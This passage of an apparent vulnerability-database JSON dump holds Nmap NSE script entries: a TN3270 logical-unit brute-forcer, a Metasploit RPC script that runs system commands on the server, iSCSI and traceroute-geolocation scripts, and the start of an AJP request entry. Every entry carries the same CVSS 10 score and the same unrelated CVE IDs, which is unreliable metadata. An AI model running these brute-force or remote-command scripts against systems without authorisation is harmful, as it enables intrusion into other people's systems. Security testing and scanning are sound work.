{\n new = function(self, host, port, options)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.options = options\n o.tn3270 = tn3270.Telnet:new()\n return o\n end,\n connect = function( self )\n return true\n end,\n disconnect = function( self )\n self.tn3270:disconnect()\n self.tn3270 = nil\n end,\n login = function (self, user, pass) -- pass is actually the username we want to try\n local path = self.options['path']\n local original = self.options['no_lu']\n local threshold = 90\n stdnse.verbose(2,\"Trying Logical Unit: %s\", pass)\n self.tn3270:set_lu(pass)\n local status, err = self.tn3270:initiate(self.host,self.port)\n if not status then\n stdnse.debug(2,\"Could not initiate TN3270: %s\", err )\n stdnse.verbose(2, \"Invalid LU: %s\",string.upper(pass))\n return false, brute.Error:new( \"Invalid Logical Unit\" )\n end\n self.tn3270:get_all_data()\n self.tn3270:get_screen_debug(2)\n if path ~= nil then\n stdnse.verbose(2,\"Writting screen to: %s\", path..string.upper(pass)..\".txt\")\n local status, err = save_screens(path..string.upper(pass)..\".txt\",self.tn3270:get_screen())\n if not status then\n stdnse.verbose(2,\"Failed writting screen to: %s\", path..string.upper(pass)..\".txt\")\n end\n end\n\n stdnse.debug(3, \"compare results: %s \", tostring(screen_diff(original, self.tn3270:get_screen_raw())))\n if screen_diff(original, self.tn3270:get_screen_raw()) > threshold then\n stdnse.verbose(2,'Same Screen for LU: %s',string.upper(pass))\n return false, brute.Error:new( \"Invalid Logical Unit\" )\n else\n stdnse.verbose(2,\"Valid Logical Unit: %s\",string.upper(pass))\n return true, creds.Account:new(\"LU\", string.upper(pass), creds.State.VALID)\n end\n end\n}\n\n--- Tests the target to see if we can connect with TN3270E\n--\n-- @param host host NSE object\n-- @param port port NSE object\n-- @return status true on success, false on failure\nlocal function lu_test( host, port )\n local tn = tn3270.Telnet:new()\n local status, err = tn:initiate(host,port)\n \n if not status then\n stdnse.debug(1,\"[lu_test] Could not initiate TN3270: %s\", err )\n return false\n end\n\n stdnse.debug(2,\"[lu_test] Displaying initial TN3270 Screen:\")\n tn:get_screen_debug(2) -- prints TN3270 screen to debug\n if tn.state == tn.TN3270E_DATA then -- Could make a function in the library 'istn3270e'\n stdnse.debug(1,\"[lu_test] Orig screen: %s\", tn:get_screen_raw())\n return true, tn:get_lu(), tn:get_screen_raw()\n else \n return false, 'Not in TN3270E Mode. LU not supported.', ''\n end\n\nend\n\n-- Checks if it's a valid Logical Unit name\nlocal valid_lu = function(x)\n return (string.len(x) <= 8 and string.match(x,\"[%w@#%$]\"))\nend\n\n-- iterator function\nfunction iter(t)\n local i, val\n return function()\n i, val = next(t, i)\n return val\n end\nend\n\naction = function(host, port)\n local lu_id_file = stdnse.get_script_args(\"lulist\")\n local path = stdnse.get_script_args(SCRIPT_NAME .. '.path') -- Folder for screen grabs\n local logical_units = {}\n lu_id_file = ((lu_id_file and nmap.fetchfile(lu_id_file)) or lu_id_file) \n\n local status, lu, orig_screen = lu_test( host, port )\n if status then\n \n \n if not lu_id_file then\n -- we have to do this here because we don't have an LU to use for the template until now\n stdnse.debug(3, \"No LU list provided, auto generating a list using template: %s##\", lu:sub(1, (#lu-2)))\n for i=1,99 do\n table.insert(logical_units, lu:sub(1, (#lu-2)) .. string.format(\"%02d\", i))\n end\n else \n for l in io.lines(lu_id_file) do\n local cleaned_line = string.gsub(l,\"[\\r\\n]\",\"\")\n if not cleaned_line:match(\"#!comment:\") then\n table.insert(logical_units, cleaned_line)\n end\n end\n end\n \n \n -- Make sure we pass the original screen we got to the brute \n local options = { no_lu = orig_screen, path = path }\n if path ~= nil then stdnse.verbose(2,\"Saving Screenshots to: %s\", path) end\n local engine = brute.Engine:new(Driver, host, port, options)\n engine.options.script_name = SCRIPT_NAME\n engine:setPasswordIterator(unpwdb.filter_iterator(iter(logical_units), valid_lu))\n engine.options.passonly = true\n engine.options:setTitle(\"Logical Units\")\n local status, result = engine:start()\n return result\n else\n stdnse.debug(1,\"Not in TN3270E mode, LU not supported.\")\n return lu\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:40:56", "description": "Gathers info from the Metasploit rpc service. It requires a valid login pair. After authentication it tries to determine Metasploit version and deduce the OS type. Then it creates a new console and executes few commands to get additional info. \n\nReferences: \n\n * <http://wiki.msgpack.org/display/MSGPACK/Format+specification>\n * <https://community.rapid7.com/docs/DOC-1516> Metasploit RPC API Guide\n\n### See also:\n\n * [ metasploit-msgrpc-brute.nse ](<../scripts/metasploit-msgrpc-brute.html>)\n\n## Script Arguments \n\n#### metasploit-info.password \n\nValid metasploit rpc password (required)\n\n#### metasploit-info.command \n\nCustom command to run on the server (optional)\n\n#### metasploit-info.username \n\nValid metasploit rpc username (required)\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap <target> --script=metasploit-info --script-args username=root,password=root\n\n## Script Output \n \n \n 55553/tcp open metasploit-msgrpc syn-ack\n | metasploit-info:\n | Metasploit version: 4.4.0-dev Ruby version: 1.9.3 i386-mingw32 2012-02-16 API version: 1.0\n | Additional info:\n | Host Name: WIN\n | OS Name: Microsoft Windows XP Professional\n | OS Version: 5.1.2600 Service Pack 3 Build 2600\n | OS Manufacturer: Microsoft Corporation\n | OS Configuration: Standalone Workstation\n | OS Build Type: Uniprocessor Free\n | ..... lots of other info ....\n | Domain: WORKGROUP\n |_ Logon Server: \\\\BLABLA\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [http](<../lib/http.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-07-08T10:34:41", "type": "nmap", "title": "metasploit-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-05T21:57:41", "id": "NMAP:METASPLOIT-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/metasploit-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal http = require \"http\"\n\ndescription = [[\nGathers info from the Metasploit rpc service. It requires a valid login pair.\nAfter authentication it tries to determine Metasploit version and deduce the OS\ntype. Then it creates a new console and executes few commands to get\nadditional info.\n\nReferences:\n* http://wiki.msgpack.org/display/MSGPACK/Format+specification\n* https://community.rapid7.com/docs/DOC-1516 Metasploit RPC API Guide\n]]\n\n---\n--@usage\n-- nmap <target> --script=metasploit-info --script-args username=root,password=root\n--@output\n-- 55553/tcp open metasploit-msgrpc syn-ack\n-- | metasploit-info:\n-- | Metasploit version: 4.4.0-dev Ruby version: 1.9.3 i386-mingw32 2012-02-16 API version: 1.0\n-- | Additional info:\n-- | Host Name: WIN\n-- | OS Name: Microsoft Windows XP Professional\n-- | OS Version: 5.1.2600 Service Pack 3 Build 2600\n-- | OS Manufacturer: Microsoft Corporation\n-- | OS Configuration: Standalone Workstation\n-- | OS Build Type: Uniprocessor Free\n-- | ..... lots of other info ....\n-- | Domain: WORKGROUP\n-- |_ Logon Server: \\\\BLABLA\n--\n-- @args metasploit-info.username Valid metasploit rpc username (required)\n-- @args metasploit-info.password Valid metasploit rpc password (required)\n-- @args metasploit-info.command Custom command to run on the server (optional)\n--\n-- @see metasploit-msgrpc-brute.nse\n\n\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\",\"safe\"}\n\nportrule = shortport.port_or_service(55553,\"metasploit-msgrpc\")\nlocal arg_username = stdnse.get_script_args(SCRIPT_NAME .. \".username\")\nlocal arg_password = stdnse.get_script_args(SCRIPT_NAME .. \".password\")\nlocal arg_command = stdnse.get_script_args(SCRIPT_NAME .. \".command\")\nlocal os_type\n\n-- returns a \"prefix\" that msgpack uses for strings\nlocal get_prefix = function(data)\n if #data <= 31 then\n return string.pack(\"B\", 0xa0 + #data)\n else\n return \"\\xda\" .. string.pack(\">I2\", #data)\n end\nend\n\n-- returns a msgpacked data for console.read\nlocal encode_console_read = function(method,token, console_id)\n return \"\\x93\" .. get_prefix(method) .. method .. \"\\xda\\x00\\x20\" .. token .. get_prefix(console_id) .. console_id\nend\n\n-- returns a msgpacked data for console.write\nlocal encode_console_write = function(method, token, console_id, command)\n return \"\\x94\" .. get_prefix(method) .. method .. \"\\xda\\x00\\x20\" .. token .. get_prefix(console_id) .. console_id .. get_prefix(command) .. command\nend\n\n-- returns a msgpacked data for auth.login\nlocal encode_auth = function(username, password)\n local method = \"auth.login\"\n return \"\\x93\\xaa\" .. method .. get_prefix(username) .. username .. get_prefix(password) .. password\nend\n\n-- returns a msgpacked data for any method without extra parameters\nlocal encode_noparam = function(token,method)\n -- token is always the same length\n return \"\\x92\" .. get_prefix(method) .. method .. \"\\xda\\x00\\x20\" .. token\nend\n\n-- does the actual call with specified, pre-packed data\n-- and returns the response\nlocal msgrpc_call = function(host, port, msg)\n local data\n local options = {\n header = {\n [\"Content-Type\"] = \"binary/message-pack\"\n }\n }\n data = http.post(host,port, \"/api/\",options, nil , msg)\n if data and data.status and tostring( data.status ):match( \"200\" ) then\n return data.body\n end\n return nil\nend\n\n-- auth.login wrapper, returns the auth token\nlocal login = function(username, password,host,port)\n\n local data = msgrpc_call(host, port, encode_auth(username,password))\n\n if data then\n local start = string.find(data,\"success\")\n if start > -1 then\n -- get token\n local token = string.sub(string.sub(data,start),17) -- \"manually\" unpack token\n return true, token\n else\n return false, nil\n end\n end\n stdnse.debug1(\"something is wrong:\" .. data )\n return false, nil\nend\n\n-- core.version wrapper, returns version info, and sets the OS type\n-- so we can decide which commands to send later\nlocal get_version = function(host, port, token)\n local msg = encode_noparam(token,\"core.version\")\n\n local data = msgrpc_call(host, port, msg)\n -- unpack data\n if data then\n -- get version, ruby version, api version\n local start = string.find(data,\"version\")\n local metasploit_version\n local ruby_version\n local api_version\n if start then\n metasploit_version = string.sub(string.sub(data,start),9)\n start = string.find(metasploit_version,\"ruby\")\n start = start - 2\n metasploit_version = string.sub(metasploit_version,1,start)\n start = string.find(data,\"ruby\")\n ruby_version = string.sub(string.sub(data,start),6)\n start = string.find(ruby_version,\"api\")\n start = start - 2\n ruby_version = string.sub(ruby_version,1,start)\n start = string.find(data,\"api\")\n api_version = string.sub(string.sub(data,start),5)\n -- put info in a table and parse for OS detection and other info\n port.version.name = \"metasploit-msgrpc\"\n port.version.product = metasploit_version\n port.version.name_confidence = 10\n nmap.set_port_version(host,port)\n local info = \"Metasploit version: \" .. metasploit_version .. \" Ruby version: \" .. ruby_version .. \" API version: \" .. api_version\n if string.find(ruby_version,\"mingw\") < 0 then\n os_type = \"linux\" -- assume linux for now\n else -- mingw compiler means it's a windows build\n os_type = \"windows\"\n end\n stdnse.debug1(\"%s\", info)\n return info\n end\n end\n return nil\nend\n\n-- console.create wrapper, returns console_id\n-- which we can use to interact with metasploit further\nlocal create_console = function(host,port,token)\n local msg = encode_noparam(token,\"console.create\")\n local data = msgrpc_call(host, port, msg)\n -- unpack data\n if data then\n --get console id\n local start = string.find(data,\"id\")\n local console_id\n if start then\n console_id = string.sub(string.sub(data,start),4)\n local next_token = string.find(console_id,\"prompt\")\n console_id = string.sub(console_id,1,next_token-2)\n return console_id\n end\n end\n return nil\n\nend\n\n-- console.read wrapper\nlocal read_console = function(host,port,token,console_id)\n local msg = encode_console_read(\"console.read\",token,console_id)\n local data = msgrpc_call(host, port, msg)\n -- unpack data\n if data then\n -- check if busy\n while string.byte(data,string.len(data)) == 0xc3 do\n -- console is busy , let's retry in one second\n stdnse.sleep(1)\n data = msgrpc_call(host, port, msg)\n end\n local start = string.find(data,\"data\")\n local read_data\n if start then\n read_data = string.sub(string.sub(data,start),8)\n local next_token = string.find(read_data,\"prompt\")\n read_data = string.sub(read_data,1,next_token-2)\n return read_data\n end\n end\nend\n\n-- console.write wrapper\nlocal write_console = function(host,port,token,console_id,command)\n local msg = encode_console_write(\"console.write\",token,console_id,command .. \"\\n\")\n local data = msgrpc_call(host, port, msg)\n -- unpack data\n if data then\n return true\n end\n return false\nend\n\n-- console.destroy wrapper, just to be nice, we don't want console to hang ...\nlocal destroy_console = function(host,port,token,console_id)\n local msg = encode_console_read(\"console.destroy\",token,console_id)\n local data = msgrpc_call(host, port, msg)\nend\n\n-- write command and read result helper\nlocal write_read_console = function(host,port,token, console_id,command)\n if write_console(host,port,token,console_id, command) then\n local read_data = read_console(host,port,token,console_id)\n if read_data then\n read_data = string.sub(read_data,string.find(read_data,\"\\n\")+1) -- skip command echo\n return read_data\n end\n end\n return nil\nend\n\naction = function( host, port )\n if not arg_username or not arg_password then\n stdnse.debug1(\"This script requires username and password supplied as arguments\")\n return false\n end\n\n -- authenticate\n local status, token = login(arg_username,arg_password,host,port)\n if status then\n -- get version info\n local info = get_version(host,port,token)\n local console_id = create_console(host,port,token)\n if console_id then\n local read_data = read_console(host,port,token,console_id) -- first read the banner/ascii art\n stdnse.debug2(\"%s\", read_data) -- print the nice looking banner if dbg level high enough :)\n if read_data then\n if os_type == \"linux\" then\n read_data = write_read_console(host,port,token,console_id, \"uname -a\")\n if read_data then\n info = info .. \"\\nAdditional info: \" .. read_data\n end\n read_data = write_read_console(host,port,token,console_id, \"id\")\n if read_data then\n info = info .. read_data\n end\n elseif os_type == \"windows\" then\n read_data = write_read_console(host,port,token,console_id, \"systeminfo\")\n if read_data then\n stdnse.debug2(\"%s\", read_data) -- print whole info if dbg level high enough\n local stop = string.find(read_data,\"Hotfix\") -- trim data down , systeminfo return A LOT\n read_data = string.sub(read_data,1,stop-2)\n info = info .. \"\\nAdditional info: \\n\" .. read_data\n end\n end\n if arg_command then\n read_data = write_read_console(host,port,token,console_id, arg_command)\n if read_data then\n info = info .. \"\\nCustom command output: \" .. read_data\n end\n end\n if read_data then\n -- let's be nice and close the console\n destroy_console(host,port,token,console_id)\n end\n end\n end\n if info then\n return stdnse.format_output(true,info)\n end\n end\n return false\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:21", "description": "Collects and displays information from remote iSCSI targets.\n\n## Example Usage \n \n \n nmap -sV -sC <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 3260/tcp open iscsi\n | iscsi-info:\n | iqn.2006-01.com.openfiler:tsn.c8c08cad469d\n | Address: 192.168.56.5:3260,1\n | Authentication: NOT required\n | iqn.2006-01.com.openfiler:tsn.6aea7e052952\n | Address: 192.168.56.5:3260,1\n | Authentication: required\n |_ Auth reason: Authentication failure\n \n\n## Requires \n\n * [iscsi](<../lib/iscsi.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-12-10T23:20:59", "type": "nmap", "title": "iscsi-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:ISCSI-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/iscsi-info.html", "sourceData": "local iscsi = require \"iscsi\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nCollects and displays information from remote iSCSI targets.\n]]\n\n---\n-- @output\n-- PORT STATE SERVICE\n-- 3260/tcp open iscsi\n-- | iscsi-info:\n-- | iqn.2006-01.com.openfiler:tsn.c8c08cad469d\n-- | Address: 192.168.56.5:3260,1\n-- | Authentication: NOT required\n-- | iqn.2006-01.com.openfiler:tsn.6aea7e052952\n-- | Address: 192.168.56.5:3260,1\n-- | Authentication: required\n-- |_ Auth reason: Authentication failure\n--\n-- @xmloutput\n-- <table key=\"iqn.2006-01.com.openfiler:tsn.c8c08cad469d\">\n-- <elem key=\"Address\">192.168.56.5:3260,1</elem>\n-- <elem key=\"Authentication\">NOT required</elem>\n-- </table>\n-- <table key=\"iqn.2006-01.com.openfiler:tsn.6aea7e052952\">\n-- <elem key=\"Address\">192.168.56.5:3260,1</elem>\n-- <elem key=\"Authentication\">required</elem>\n-- <elem key=\"Auth reason\">Authentication failure</elem>\n-- </table>\n\n-- Version 0.2\n-- Created 2010/11/18 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 2010/11/28 - v0.2 - improved error handling <patrik@cqure.net>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"safe\", \"discovery\"}\n\n\nportrule = shortport.portnumber(3260, \"tcp\", {\"open\", \"open|filtered\"})\n\n-- Attempts to determine whether authentication is required or not\n--\n-- @return status true on success false on failure\n-- @return result true if auth is required false if not\n-- err string containing error message\nlocal function requiresAuth( host, port, target )\n local helper = iscsi.Helper:new( host, port )\n local errors = iscsi.Packet.LoginResponse.Errors\n\n local status, err = helper:connect()\n if ( not(status) ) then return false, \"Failed to connect\" end\n\n local response\n status, response = helper:login( target )\n if ( not(status) ) then return false, response:getErrorMessage() end\n\n if ( status and response:getErrorCode() == errors.SUCCESS) then\n -- try to logout\n status = helper:logout()\n end\n\n status = helper:close()\n\n return true, \"Authentication successful\"\nend\n\naction = function( host, port )\n\n local helper = iscsi.Helper:new( host, port )\n\n local status = helper:connect()\n if ( not(status) ) then\n stdnse.debug1(\"failed to connect to server\" )\n return\n end\n\n local records\n status, records = helper:discoverTargets()\n if ( not(status) ) then\n stdnse.debug1(\"failed to discover targets\" )\n return\n end\n status = helper:logout()\n status = helper:close()\n\n local result = stdnse.output_table()\n for _, record in ipairs(records) do\n local result_part = stdnse.output_table()\n for _, addr in ipairs( record.addr ) do\n result_part[\"Address\"] = addr\n end\n\n local status, err = requiresAuth( host, port, record.name )\n if ( not(status) ) then\n result_part[\"Authentication\"] = \"required\"\n result_part[\"Auth reason\"] = err\n else\n result_part[\"Authentication\"] = \"NOT required\"\n end\n result[record.name] = result_part\n end\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:33:24", "description": "Lists the geographic locations of each hop in a traceroute and optionally saves the results to a KML file, plottable on Google earth and maps.\n\n## Script Arguments \n\n#### traceroute-geolocation.kmlfile \n\nfull path and name of file to write KML data to. The KML file can be used in Google earth or maps to plot the traceroute data.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --traceroute --script traceroute-geolocation\n \n\n## Script Output \n \n \n | traceroute-geolocation:\n | hop RTT ADDRESS GEOLOCATION\n | 1 ...\n | 2 ...\n | 3 ...\n | 4 ...\n | 5 16.76 e4-0.barleymow.stk.router.colt.net (194.68.128.104) 62,15 Sweden (Unknown)\n | 6 48.61 te0-0-2-0-crs1.FRA.router.colt.net (212.74.65.49) 54,-2 United Kingdom (Unknown)\n | 7 57.16 87.241.37.146 42,12 Italy (Unknown)\n | 8 157.85 212.162.64.146 42,12 Italy (Unknown)\n | 9 ...\n |_ 10 ...\n\n## Requires \n\n * [http](<../lib/http.html>)\n * [io](<>)\n * [json](<../lib/json.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n * [ipOps](<../lib/ipOps.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-17T19:39:27", "type": "nmap", "title": "traceroute-geolocation NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-09T00:15:07", "id": "NMAP:TRACEROUTE-GEOLOCATION.NSE", "href": "https://nmap.org/nsedoc/scripts/traceroute-geolocation.html", "sourceData": "local http = require \"http\"\nlocal io = require \"io\"\nlocal json = require \"json\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\nlocal ipOps = require \"ipOps\"\n\ndescription = [[\nLists the geographic locations of each hop in a traceroute and optionally\nsaves the results to a KML file, plottable on Google earth and maps.\n]]\n\n---\n-- @usage\n-- nmap --traceroute --script traceroute-geolocation\n--\n-- @output\n-- | traceroute-geolocation:\n-- | hop RTT ADDRESS GEOLOCATION\n-- | 1 ...\n-- | 2 ...\n-- | 3 ...\n-- | 4 ...\n-- | 5 16.76 e4-0.barleymow.stk.router.colt.net (194.68.128.104) 62,15 Sweden (Unknown)\n-- | 6 48.61 te0-0-2-0-crs1.FRA.router.colt.net (212.74.65.49) 54,-2 United Kingdom (Unknown)\n-- | 7 57.16 87.241.37.146 42,12 Italy (Unknown)\n-- | 8 157.85 212.162.64.146 42,12 Italy (Unknown)\n-- | 9 ...\n-- |_ 10 ...\n-- @xmloutput\n-- <table>\n-- <elem key=\"hop\">1</elem>\n-- </table>\n-- <table>\n-- <elem key=\"hop\">2</elem>\n-- </table>\n-- <table>\n-- <elem key=\"hop\">3</elem>\n-- </table>\n-- <table>\n-- <elem key=\"hop\">4</elem>\n-- </table>\n-- <table>\n-- <elem key=\"hop\">5</elem>\n-- <elem key=\"rtt\">16.76</elem>\n-- <elem key=\"ip\">194.68.128.104</elem>\n-- <elem key=\"hostname\">e4-0.barleymow.stk.router.colt.net</elem>\n-- <elem key=\"lat\">62</elem>\n-- <elem key=\"lon\">15</elem>\n-- </table>\n-- <table>\n-- <elem key=\"hop\">6</elem>\n-- <elem key=\"rtt\">48.61</elem>\n-- <elem key=\"ip\">212.74.65.49</elem>\n-- <elem key=\"hostname\">te0-0-2-0-crs1.FRA.router.colt.net</elem>\n-- <elem key=\"lat\">54</elem>\n-- <elem key=\"lon\">-2</elem>\n-- </table>\n--\n-- @args traceroute-geolocation.kmlfile full path and name of file to write KML\n-- data to. The KML file can be used in Google earth or maps to plot the\n-- traceroute data.\n--\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"external\", \"discovery\"}\n\nlocal arg_kmlfile = stdnse.get_script_args(SCRIPT_NAME .. \".kmlfile\")\n\nhostrule = function(host)\n if ( not(host.traceroute) ) then\n return false\n end\n return true\nend\n\n--\n-- GeoPlugin requires no API key and has no limitations on lookups\n--\nlocal function geoLookup(ip, no_cache)\n local output = stdnse.registry_get({SCRIPT_NAME, ip})\n if output then return output end\n\n local response = http.get(\"www.geoplugin.net\", 80, \"/json.gp?ip=\"..ip, {any_af=true})\n local stat, loc = json.parse(response.body)\n\n local get_value = function (d)\n local t = type(d)\n return (t == \"string\" or t == \"number\") and d or nil\n end\n\n if not (stat\n and get_value(loc.geoplugin_latitude)\n and get_value(loc.geoplugin_longitude)) then\n return nil\n end\n output = {\n lat = loc.geoplugin_latitude,\n lon = loc.geoplugin_longitude,\n reg = get_value(loc.geoplugin_regionName) or \"Unknown\",\n ctry = get_value(loc.geoplugin_countryName) or \"Unknown\"\n }\n if not no_cache then\n stdnse.registry_add_table({SCRIPT_NAME}, ip, output)\n end\n return output\nend\n\nlocal function createKMLFile(filename, coords)\n local header = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><kml xmlns=\"http://earth.google.com/kml/2.0\"><Document><Placemark><LineString><coordinates>\\r\\n'\n local footer = '</coordinates></LineString><Style><LineStyle><color>#ff0000ff</color></LineStyle></Style></Placemark></Document></kml>'\n\n local output = {}\n for _, coord in ipairs(coords) do\n output[#output+1] = (\"%s,%s, 0.\\r\\n\"):format(coord.lon, coord.lat)\n end\n\n local f = io.open(filename, \"w\")\n if ( not(f) ) then\n return false, \"Failed to create KML file\"\n end\n f:write(header .. table.concat(output) .. footer)\n f:close()\n\n return true\nend\n\n-- Tables used to accumulate output.\nlocal output_structured = {}\nlocal output = tab.new(4)\nlocal coordinates = {}\n\nlocal function output_hop(count, ip, name, rtt, geo)\n if ip then\n local label\n if name then\n label = (\"%s (%s)\"):format(name or \"\", ip)\n else\n label = (\"%s\"):format(ip)\n end\n if geo then\n table.insert(output_structured, { hop = count, ip = ip, hostname = name, rtt = (\"%.2f\"):format(rtt), lat = geo.lat, lon = geo.lon })\n tab.addrow(output, count, (\"%.2f\"):format(rtt), label, (\"%.3f,%.3f %s (%s)\"):format(geo.lat, geo.lon, geo.ctry, geo.reg))\n table.insert(coordinates, { hop = count, lat = geo.lat, lon = geo.lon })\n else\n table.insert(output_structured, { hop = count, ip = ip, hostname = name, rtt = (\"%.2f\"):format(rtt) })\n tab.addrow(output, count, (\"%.2f\"):format(rtt), label, (\"%s,%s\"):format(\"- \", \"- \"))\n end\n else\n table.insert(output_structured, { hop = count })\n tab.addrow(output, count, \"...\")\n end\nend\n\naction = function(host)\n tab.addrow(output, \"HOP\", \"RTT\", \"ADDRESS\", \"GEOLOCATION\")\n for count = 1, #host.traceroute do\n local hop = host.traceroute[count]\n -- avoid timedout hops, marked as empty entries\n -- do not add the current scanned host.ip\n if hop.ip then\n local rtt = tonumber(hop.srtt) * 1000\n local geo\n if not ipOps.isPrivate(hop.ip) then\n -- be sure not to cache the target address, since it's not likely to be\n -- a hop for something else.\n geo = geoLookup(hop.ip, ipOps.compare_ip(hop.ip, \"eq\", host.ip) )\n end\n output_hop(count, hop.ip, hop.name, rtt, geo)\n else\n output_hop(count)\n end\n end\n\n if (#output_structured > 0) then\n output = tab.dump(output)\n if ( arg_kmlfile ) then\n if ( not(createKMLFile(arg_kmlfile, coordinates)) ) then\n output = output .. (\"\\n\\nERROR: Failed to write KML to file: %s\"):format(arg_kmlfile)\n end\n end\n return output_structured, stdnse.format_output(true, output)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:34", "description": "Requests a URI over the Apache JServ Protocol and displays the result (or stores it in a file). Different AJP methods such as; GET, HEAD, TRACE, PUT or DELETE may be used. \n\nThe Apache JServ Protocol is commonly used by web servers to communicate with back-end Java application server containers.\n\n## Script Arguments \n\n#### username \n\nthe username to use to access protected resources\n\n#### path \n\nthe path part of the URI to request\n\n#### filename \n\nthe name of the file where the results should be stored\n\n#### password \n\nthe password to use to access protected resources\n\n#### method \n\nAJP method to be used when requesting the URI (default: GET)\n\n#### 